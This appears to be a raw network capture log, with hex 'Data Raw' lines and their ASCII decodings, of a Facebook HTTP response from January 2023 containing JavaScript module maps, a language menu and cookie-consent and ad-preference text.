                                                                                                                                                                                    Data Ascii: jskFjuE","ZoYS+Li","+CEjbBy","eAij9Z9","4nCr7YF","FJvGK\/j","gitt+mK","SgD0G1q","UFbKXJM","vptUJy8","3mc6ybv","Pud6B2Z","pI0Ykx3","m6PclIQ","il8+1P2","dvxITuo","gcD4NcR","Ez61A3Q","SZ7DqCB","kOEHvpu","ORfF6wp","mO2RUoG","amlKOxk","eMkMxHZ","uyLLtYc","M7\/
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16172INData Raw: 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 54 61 67 73 22 3a 7b 22 72 22 3a 5b 22 72 72 6e 53 4d 64 39 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 6c 2b 7a 59 45 30 73 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 61 67 54 6f 6b 65 6e 69 7a 65 72 22 3a 7b 22 72 22 3a 5b 22 72 72 6e 53 4d 64 39 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 75 5a 6e 59 6e 6a 41 22 2c 22 6d 30 7a 4c 6d 36 49 22 2c 22 74 75 65 37 4e 33 65 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 53 67 44 30 47 31 71 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 30 43 4e 77 48 33 6f 22 2c 22 64 76 78 49 54 75 6f 22 2c 22 6c 2b 7a 59 45 30 73 22 2c 22 52 77 4e 47 46 74 38 22 2c 22 50 55 64 36 34 39 6b 22
                                                                                                                                                                                    Data Ascii: "be":1},"PhotoTags":{"r":["rrnSMd9","fBNyzd4","+CEjbBy","l+zYE0s","uyLLtYc","e3dyWaF"],"be":1},"TagTokenizer":{"r":["rrnSMd9","fBNyzd4","uZnYnjA","m0zLm6I","tue7N3e","jskFjuE","+CEjbBy","SgD0G1q","pI0Ykx3","0CNwH3o","dvxITuo","l+zYE0s","RwNGFt8","PUd649k"
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16174INData Raw: 5a 37 44 71 43 42 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 31 34 37 76 78 35 41 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 54 30 62 6e 53 70 59 22 2c 22 65 33 64 79 57 61 46 22 2c 22 4b 42 72 72 65 57 4d 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 74 74 58 70 77 70 52 22 2c 22 67 49 5a 67 73 58 6a 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 72
                                                                                                                                                                                    Data Ascii: Z7DqCB","ORfF6wp","147vx5A","0IBz+Hp","T0bnSpY","e3dyWaF","KBrreWM","R5w1rCJ","e9ANzw\/","eMkMxHZ","ttXpwpR","gIZgsXj"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","Animation","PageTransitions","BanzaiScuba_DEPRECATED"]},"be":1},"ExceptionDialog":{"r
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16175INData Raw: 66 42 4e 79 7a 64 34 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 67 69 74 74 2b 6d 4b 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 62 61 64 52 4b 71 42 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 74 74 58 70 77 70 52 22 2c 22 67 49 5a 67 73 58 6a 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 46 6f 6f 74 65 72 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 69 62 4e 44 63 63 78 22 2c 22 62 35 68 5c 2f 73 77 4c 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 67 69 74 74 2b 6d 4b 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 62 61 64 52 4b 71 42 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 74 74 58 70 77 70 52 22 2c 22 67 49 5a 67 73 58 6a 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 54 69 74 6c 65 2e 72
                                                                                                                                                                                    Data Ascii: fBNyzd4","jskFjuE","gitt+mK","pI0Ykx3","badRKqB","0IBz+Hp","ttXpwpR","gIZgsXj"],"be":1},"XUIDialogFooter.react":{"r":["R5w1rCJ","fBNyzd4","ibNDccx","b5h\/swL","jskFjuE","gitt+mK","pI0Ykx3","badRKqB","0IBz+Hp","ttXpwpR","gIZgsXj"],"be":1},"XUIDialogTitle.r
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16177INData Raw: 73 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 3a 74 72 75 65 2c 22 64 65 66 61 75 6c 74 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 73 77 69 74 63 68 65 64 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 22 2c 22 6e 6f 6e 5f 6c 69 6e 6b 73 68 69 6d 5f 6c 6e 66 62 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 6b 5f 72 65 61 63 74 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 31 66 6b 4b 6e 44 44 66 72 6f 4f 4c 5f 55 51 66 6a 70 62 36 6c 77 49 4a 30 55 31 6f 49 35 44 4c 39 43 59 4b 75 58 41 4a 32 71 5f 63 41 77 4a 38 51 55 57 69 49 2d 30 64 6d 47 35 4c 6a 63 79 4e 72 45 6b 50 6c 48 77 41 5f 35 79 43
                                                                                                                                                                                    Data Ascii: s_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT1fkKnDDfroOL_UQfjpb6lwIJ0U1oI5DL9CYKuXAJ2q_cAwJ8QUWiI-0dmG5LjcyNrEkPlHwA_5yC
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16178INData Raw: 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 35 66 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 6f 46 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 67 57 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 74 37 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 6c 45 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 66 5f 72 46 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 75 5a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 4f 48 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 39 6c 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30
                                                                                                                                                                                    Data Ascii: p_3310c079_0_a_5f","__markup_3310c079_0_b_oF","__markup_3310c079_0_c_gW","__markup_3310c079_0_d_t7","__markup_3310c079_0_e_lE","__markup_3310c079_0_f_rF","__markup_3310c079_0_g_uZ","__markup_3310c079_0_h_OH","__markup_3310c079_0_i_9l","__markup_3310c079_0
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16180INData Raw: 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 37 75 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 73 5f 4c 41 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 66 78 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 2c
                                                                                                                                                                                    Data Ascii: ":{"__m":"__markup_3310c079_0_4_7u"},"label":"English (US)","title":"","className":"headerItem"},{"class":"headerItem","value":"es_LA","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_5_fx"},"label":"Espa\u00f1ol",
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16181INData Raw: 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 6c 5f 50 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 67 57 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 6c 73 6b 69 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 74 5f 42 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65
                                                                                                                                                                                    Data Ascii: em","value":"pl_PL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_c_gW"},"label":"Polski","title":"","className":"headerItem"},{"class":"headerItem","value":"pt_BR","selected":false,"ctor":{"__m":"MenuSelectable
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16183INData Raw: 22 6c 61 62 65 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30 30 65 37 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 63 73 5f 43 5a 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6b 5f 71 5c 2f 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 31 30 63 65 5c 75 30 31 36 31 74 69 6e 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61
                                                                                                                                                                                    Data Ascii: "label":"T\u00fcrk\u00e7e","title":"","className":"headerItem"},{"class":"headerItem","value":"cs_CZ","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_k_q\/"},"label":"\u010ce\u0161tina","title":"","className":"hea
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16184INData Raw: 39 5f 30 5f 6f 5f 59 4f 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 69 5f 49 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 75 66 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39
                                                                                                                                                                                    Data Ascii: 9_0_o_YO"},"label":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629","title":"","className":"headerItem"},{"class":"headerItem","value":"hi_IN","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_p_uf"},"label":"\u0939\u09
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16185INData Raw: 5f 76 5f 66 54 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 5d 2c 7b 22 69 64 22 3a 22 75 5f 30 5f 36 5f 31 65 22 2c 22 62 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 57 69 74 68 53 71 75 61 72 65 43 6f 72 6e 65 72 22 7d 5d 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 5f 35 37 64 69 22 2c 22 6d 61 78 68 65 69 67 68 74 22 3a 35 30 30 2c 22 74 68 65 6d 65 22 3a 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 54 68 65 6d 65 22 7d 7d 5d 2c 33 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 4f 69 22 2c 5b 22 44 69 61 6c 6f 67 58 22 2c 22 4c 61 79 65 72
                                                                                                                                                                                    Data Ascii: _v_fT"},"label":"\ud55c\uad6d\uc5b4","title":"","className":"headerItem"}],{"id":"u_0_6_1e","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"className":"_57di","maxheight":500,"theme":{"__m":"XUIMenuTheme"}}],3],["__inst_ead1e565_0_0_Oi",["DialogX","Layer
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16187INData Raw: 67 6e 68 22 3a 22 6c 65 66 74 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 62 65 6c 6f 77 22 7d 5d 2c 32 5d 5d 2c 22 6d 61 72 6b 75 70 22 3a 5b 5b 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 74 64 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 34 2d 69 32 20 5f 70 69 67 20 5f 39 6f 2d 63 20 5f 39 70 6c 6c 20 5f 35 30 66 34 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 32 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 61 69 73 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 32 7a 5c 22 3e 5c 75 30 30 33 43 61 20
                                                                                                                                                                                    Data Ascii: gnh":"left","position":"below"}],2]],"markup":[["__markup_9f5fac15_0_0_td",{"__html":"\u003Cdiv>\u003Cdiv class=\"_4-i2 _pig _9o-c _9pll _50f4\">\u003Cdiv class=\"_9xl2\">\u003Cdiv class=\"_aisf\">\u003Cdiv class=\"_6a uiPopover\" id=\"u_0_7_2z\">\u003Ca
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16188INData Raw: 77 68 6f 20 68 61 76 65 20 61 6e 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65
                                                                                                                                                                                    Data Ascii: who have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Meta Products, analytics, and to provide certain features and improve our services for you, we
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16190INData Raw: 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 6e 53 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c
                                                                                                                                                                                    Data Ascii: ytics, and to provide certain features and improve our services for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=\"_9vtg\" id=\"u_0_9_nS\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16191INData Raw: 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f
                                                                                                                                                                                    Data Ascii: 03C\/p>\u003C\/div>\u003C\/p>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16193INData Raw: 69 63 68 20 61 64 73 20 79 6f 75 20 6d 61 79 20 62 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 73 65 65 69 6e 67 2e 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 74 68 69 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20
                                                                                                                                                                                    Data Ascii: ich ads you may be interested in seeing. You can control this in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u003Cp class=\"_9o-m\">You can use your ad
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16194INData Raw: 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 6f 70 74 20 6f 75 74 20 6f 66 20 73 65 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 4d 65 74 61 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f
                                                                                                                                                                                    Data Ascii: 03C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">You can opt out of seeing online interest-based ads from Meta and other participating companies through the \u003Ca href=\"https:\/\/l.faceboo
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16195INData Raw: 72 73 69 6f 6e 20 6f 66 20 69 4f 53 2e 20 50 6c 65 61 73 65 20 6e 6f 74 65 20 74 68 61 74 20 61 64 20 62 6c 6f 63 6b 65 72 73 20 61 6e 64 20 74 6f 6f 6c 73 20 74 68 61 74 20 72 65 73 74 72 69 63 74 20 6f 75 72 20 63 6f 6f 6b 69 65 20 75 73 65 20 6d 61 79 20 69 6e 74 65 72 66 65 72 65 20 77 69 74 68 20 74 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 68 65 20 61 64 76 65 72 74 69 73 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 77 65 20 77 6f 72 6b 20 77 69 74 68 20 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 73 69 6d 69 6c 61 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 69 72 20 73 65
                                                                                                                                                                                    Data Ascii: rsion of iOS. Please note that ad blockers and tools that restrict our cookie use may interfere with these controls.\u003C\/p>\u003Cp class=\"_9o-m\">The advertising companies we work with generally use cookies and similar technologies as part of their se
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16197INData Raw: 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 45 75 72 6f 70 65 61 6e 20 49 6e 74 65 72 61 63 74 69 76 65 20 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 63 5f 37 34 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67
                                                                                                                                                                                    Data Ascii: \" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">European Interactive Digital Advertising Alliance\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_c_74\">\u003Cbutton class=\"_9ng
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16198INData Raw: 30 72 48 6f 57 69 50 54 7a 30 37 51 45 49 42 51 67 7a 5f 31 75 67 36 42 51 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 